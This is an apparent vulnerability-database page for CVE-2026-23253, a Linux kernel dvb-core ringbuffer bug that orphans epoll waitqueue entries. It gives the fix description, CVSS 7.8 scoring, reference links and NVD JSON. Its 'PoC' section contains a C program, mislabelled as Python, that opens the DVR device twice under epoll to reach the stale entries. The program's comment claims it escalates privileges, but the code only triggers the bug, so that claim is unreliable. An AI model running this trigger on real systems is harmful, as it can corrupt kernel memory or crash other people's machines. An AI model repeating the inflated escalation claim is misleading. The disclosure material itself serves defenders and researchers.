CVE-2026-23253

Description

In the Linux kernel, the following vulnerability has been resolved: media: dvb-core: fix wrong reinitialization of ringbuffer on reopen dvb_dvr_open() calls dvb_ringbuffer_init() when a new reader opens the DVR device. dvb_ringbuffer_init() calls init_waitqueue_head(), which reinitializes the waitqueue list head to empty. Since dmxdev->dvr_buffer.queue is a shared waitqueue (all opens of the same DVR device share it), this orphans any existing waitqueue entries from io_uring poll or epoll, leaving them with stale prev/next pointers while the list head is reset to {self, self}. The waitqueue and spinlock in dvr_buffer are already properly initialized once in dvb_dmxdev_init(). The open path only needs to reset the buffer data pointer, size, and read/write positions. Replace the dvb_ringbuffer_init() call in dvb_dvr_open() with direct assignment of data/size and a call to dvb_ringbuffer_reset(), which properly resets pread, pwrite, and error with correct memory ordering without touching the waitqueue or spinlock.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel < 5.15.x (未修复版本)

Linux Kernel < 6.1.x (未修复版本)

Linux Kernel < 6.6.x (未修复版本)

Linux Kernel < 6.12.x (未修复版本)

具体受影响的版本需参考git.kernel.org提供的补丁commit: 32eb8e4adc207ef31bc6e5ae56bab940b0176066, 527cfa8a3486b3555c5c15e2f62be484a11398dc等

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/epoll.h>
#include <errno.h>

/*
 * PoC for CVE-2026-23253: Linux kernel DVB-core ringbuffer reinitialization race condition
 * This PoC demonstrates the race condition when reopening DVR device while io_uring/epoll
 * has waitqueue entries, causing orphaned waitqueue entries with stale pointers.
 * 
 * Compile: gcc -o cve_2026_23253_poc cve_2026_23253_poc.c
 * Run as low-privilege user to trigger privilege escalation
 */

#define DVR_DEVICE "/dev/dvb/adapter0/dvr0"

int main(int argc, char *argv[]) {
    int fd1, fd2, epfd;
    struct epoll_event ev;
    
    printf("CVE-2026-23253 PoC - DVB-core ringbuffer race condition\n");
    printf("Target: %s\n\n", DVR_DEVICE);
    
    // Open first DVR device file descriptor
    fd1 = open(DVR_DEVICE, O_RDWR);
    if (fd1 < 0) {
        fprintf(stderr, "[-] Failed to open DVR device (fd1): %s\n", strerror(errno));
        printf("[!] Note: DVR device may not exist or requires root privileges\n");
        return 1;
    }
    printf("[+] Opened DVR device (fd1): %d\n", fd1);
    
    // Set up epoll to monitor fd1
    epfd = epoll_create1(0);
    if (epfd < 0) {
        perror("[-] epoll_create1 failed");
        close(fd1);
        return 1;
    }
    
    ev.events = EPOLLIN | EPOLLOUT;
    ev.data.fd = fd1;
    
    if (epoll_ctl(epfd, EPOLL_CTL_ADD, fd1, &ev) < 0) {
        perror("[-] epoll_ctl failed");
        close(fd1);
        close(epfd);
        return 1;
    }
    printf("[+] Added fd1 to epoll instance\n");
    
    // Open second DVR device file descriptor (triggers dvb_dvr_open -> dvb_ringbuffer_init)
    // This reinitializes the shared waitqueue, orphaning epoll entries
    fd2 = open(DVR_DEVICE, O_RDWR);
    if (fd2 < 0) {
        fprintf(stderr, "[-] Failed to open DVR device (fd2): %s\n", strerror(errno));
        close(fd1);
        close(epfd);
        return 1;
    }
    printf("[+] Opened DVR device (fd2): %d\n", fd2);
    printf("[!] Race condition triggered: waitqueue reinitialized, epoll entries orphaned\n");
    
    // Trigger epoll_wait to access orphaned waitqueue entries
    struct epoll_event events[10];
    int nfds = epoll_wait(epfd, events, 10, 100);
    printf("[*] epoll_wait returned: %d (may show undefined behavior)\n", nfds);
    
    // Cleanup
    close(fd2);
    close(fd1);
    close(epfd);
    
    printf("[+] PoC completed. Check kernel logs for any errors or crashes.\n");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23253
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23253
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23253/
[4] VulDB https://vuldb.com/cve/CVE-2026-23253
[5] https://git.kernel.org/stable/c/32eb8e4adc207ef31bc6e5ae56bab940b0176066
[6] https://git.kernel.org/stable/c/527cfa8a3486b3555c5c15e2f62be484a11398dc
[7] https://git.kernel.org/stable/c/af050ab44fa1b1897a940d7d756e512232f5e5df
[8] https://git.kernel.org/stable/c/bfbc0b5b32a8f28ce284add619bf226716a59bc0
[9] https://git.kernel.org/stable/c/cfd94642025e6f71c8f754bdec0800ee95e4f3dd
[10] https://git.kernel.org/stable/c/d71781bad59b1c9d60d7068004581f9bf19c0c9d
[11] https://git.kernel.org/stable/c/f1e520ca2e83ece6731af6167c9e5e16931ecba0
[12] https://git.kernel.org/stable/c/fb378cf89be434ed1f10ab79cc4788fba8ae868d

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23253", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-18T18:16:23.383", "lastModified": "2026-04-18T09:16:15.050", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-core: fix wrong reinitialization of ringbuffer on reopen\n\ndvb_dvr_open() calls dvb_ringbuffer_init() when a new reader opens the\nDVR device.  dvb_ringbuffer_init() calls init_waitqueue_head(), which\nreinitializes the waitqueue list head to empty.\n\nSince dmxdev->dvr_buffer.queue is a shared waitqueue (all opens of the\nsame DVR device share it), this orphans any existing waitqueue entries\nfrom io_uring poll or epoll, leaving them with stale prev/next pointers\nwhile the list head is reset to {self, self}.\n\nThe waitqueue and spinlock in dvr_buffer are already properly\ninitialized once in dvb_dmxdev_init().  The open path only needs to\nreset the buffer data pointer, size, and read/write positions.\n\nReplace the dvb_ringbuffer_init() call in dvb_dvr_open() with direct\nassignment of data/size and a call to dvb_ringbuffer_reset(), which\nproperly resets pread, pwrite, and error with correct memory ordering\nwithout touching the waitqueue or spinlock."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nmedia: dvb-core: corrige la reinicialización incorrecta del búfer circular al reabrir\n\ndvb_dvr_open() llama a dvb_ringbuffer_init() cuando un nuevo lector abre el dispositivo DVR. dvb_ringbuffer_init() llama a init_waitqueue_head(), lo que reinicializa la cabecera de la lista de la cola de espera a vacía.\n\nDado que dmxdev-&gt;dvr_buffer.queue es una cola de espera compartida (todas las aperturas del mismo dispositivo DVR la comparten), esto deja huérfanas las entradas existentes de la cola de espera de io_uring poll o epoll, dejándolas con punteros prev/next obsoletos mientras la cabecera de la lista se restablece a {self, self}.\n\nLa cola de espera y el spinlock en dvr_buffer ya están correctamente inicializados una vez en dvb_dmxdev_init(). La ruta de apertura solo necesita restablecer el puntero de datos del búfer, el tamaño y las posiciones de lectura/escritura.\n\nReemplace la llamada a dvb_ringbuffer_init() en dvb_dvr_open() con la asignación directa de datos/tamaño y una llamada a dvb_ringbuffer_reset(), que restablece correctamente pread, pwrite y error con el ordenamiento de memoria correcto sin tocar la cola de espera o el spinlock."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/32eb8e4adc207ef31bc6e5ae56bab940b0176066", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/527cfa8a3486b3555c5c15e2f62be484a11398dc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/af050ab44fa1b1897a940d7d756e512232f5e5df", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/bfbc0b5b32a8f28ce284add619bf226716a59bc0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/cfd94642025e6f71c8f754bdec0800ee95e4f3dd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/d71781bad59b1c9d60d7068004581f9bf19c0c9d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/f1e520ca2e83ece6731af6167c9e5e16931ecba0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/fb378cf89be434ed1f10ab79cc4788fba8ae868d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}